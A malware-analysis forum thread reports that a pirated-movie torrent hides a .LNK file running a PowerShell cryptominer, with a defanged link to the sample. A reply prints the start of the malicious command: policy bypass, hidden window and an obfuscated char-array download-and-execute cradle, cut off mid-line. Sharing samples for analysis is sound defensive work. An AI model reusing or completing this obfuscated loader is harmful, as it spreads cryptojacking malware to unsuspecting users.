Virus on torrent. Cryptominer.

Forum for analysis and discussion about malware.
Post Reply
Haruhi
Posts: 8
Joined: Wed May 28, 2014 9:43 am

Virus on torrent. Cryptominer.

Post by Haruhi » Wed Jan 16, 2019 8:29 pm

One torrent in ThePirateBay, of a new release carry a ".LNK" file. This file contains a lot of information. Is a powershell virus capable of cryptocurrency mining.

Movie: The_girl_in_the_spider_web. Researcher: @0xffff0800

hxxps://mega.nz/#!N80XUCza!rgQMgunzj8qHHlVDCypxBXNrNYa_ZE8oDk3LatADBwg enjoy.

+2.000 seeders :|

hackr8
Posts: 23
Joined: Fri Dec 21, 2018 1:50 pm
Contact:

Re: Virus on torrent. Cryptominer.

Post by hackr8 » Thu Jan 17, 2019 11:49 am

Raw code:

Code: Select all

powershell.exe -NoPr -WINd 1 -eXEc ByP   iex ("$( SeT-ITeM  'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101

AV detection: https://www.virustotal.com/#/file/9e5a3 ... /detection
You do not have the required permissions to view the files attached to this post.
My forum: hackrhouse.freeforums.net

Post Reply